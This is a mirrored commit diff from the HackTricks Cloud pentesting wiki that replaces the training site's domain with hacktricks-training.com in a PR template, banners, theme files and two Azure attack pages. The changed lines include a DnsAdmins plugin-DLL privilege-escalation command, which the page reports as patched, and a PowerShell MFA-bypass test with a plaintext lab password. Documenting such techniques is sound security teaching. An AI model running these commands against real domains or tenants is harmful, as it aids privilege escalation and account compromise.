gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-03-12 21:22:57 -07:00
Code Issues Packages Projects Releases Wiki Activity

f ht url

Browse Source
This commit is contained in:
Carlos Polop
2026-02-12 14:18:33 +01:00
parent d319c5283b
commit 745851f56d
6 changed files with 10 additions and 10 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
.github/pull_request_template.md vendored
View File

@@ -4,7 +4,7 @@ You can remove this content before sending the PR:
We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
## HackTricks Training
If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.
If you are sending a PR so you can pass the in the [ARTE certification](https://hacktricks-training.com/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`, `grte-<username>` or `azrte-<username>`, depending on the certification you are doing.
Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.

6
src/banners/hacktricks-training.md
View File

@@ -1,7 +1,7 @@
> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>

4
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md
View File

@@ -25,7 +25,7 @@ Members of the generated **`AAD DC Administrators`** group are granted local adm
- **`DnsAdmins`**: This group allows to manage the DNS settings and was abused in the past to [escalate privileges and compromise the domain](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), however after testing the attack in this environment it was checked that the vulnerability is patched:
```text
dnscmd TDW52Y80ZE26M1K.azure.training.hacktricks.xyz /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
DNS Server failed to reset registry property.
Status = 5 (0x00000005)
@@ -62,7 +62,7 @@ az rest --method post \
# Get domain configuration
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/<domain-name>?api-version=2022-12-01&healthdata=true"
## e.g.
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.training.hacktricks.xyz?api-version=2022-12-01&healthdata=true"
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.hacktricks-training.com?api-version=2022-12-01&healthdata=true"
# Based on the VNet assigned to the domain services, you can enumerate the VMs in the domain

2
src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
View File

@@ -164,7 +164,7 @@ Donkey token is a set of functions which aim to help security consultants who ne
**Test each portal** if it's possible to **login without MFA**:
```bash
$username = "conditional-access-app-user@azure.training.hacktricks.xyz"
$username = "conditional-access-app-user@azure.hacktricks-training.com"
$password = ConvertTo-SecureString "Poehurgi78633" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($username, $password)
Invoke-MFATest -credential $cred -Verbose -Debug -InformationAction Continue

2
theme/ai.js
View File

@@ -14,7 +14,7 @@
* ❶ Markdown rendering + sanitised (same as before)
* ❷ ENHANCED: improved dragtoresize panel with better UXdiscount.jpeg';
const TXT = 'Click here for HT Summer Discounts, Last Days!';
const URL = 'https://training.hacktricks.xyz';
const URL = 'https://hacktricks-training.com';
// Stop if user already dismissed
if (localStorage.getItem(KEY) === 'true') return;

4
theme/index.hbs
View File

@@ -151,7 +151,7 @@
<div class="right-buttons">
<div id="menubar-collapse">
<a class="menu-bar-link" href="https://training.hacktricks.xyz" target="_blank">
<a class="menu-bar-link" href="https://hacktricks-training.com" target="_blank">
HT Training
</a>
<a class="menu-bar-link" href="https://book.hacktricks.wiki/" target="_blank">
@@ -174,7 +174,7 @@
<div id="menubar-collapse-toggle" class="icon-button" type="button" title="Toggle menu bar" aria-label="Toggle Menu bar" aria-expanded="false" aria-controls="collapse">
<span class="menu-hamburger" aria-hidden="true">≡</span>
<div id="menubar-collapse-popup" class="menubar-collapse-popup" aria-label="Menu" role="menu">
<a href="https://training.hacktricks.xyz" target="_blank" role="menuitem" class="menu-bar-link">HT Training</a>
<a href="https://hacktricks-training.com" target="_blank" role="menuitem" class="menu-bar-link">HT Training</a>
<a href="https://book.hacktricks.wiki/" target="_blank" role="menuitem" class="menu-bar-link">Book HT</a>
<a href="https://tools.hacktricks.wiki/" target="_blank" role="menuitem" class="menu-bar-link">HT Tools</a>
<a href="https://github.com/sponsors/carlospolop" target="_blank" role="menuitem" class="menu-bar-link">Sponsor</a>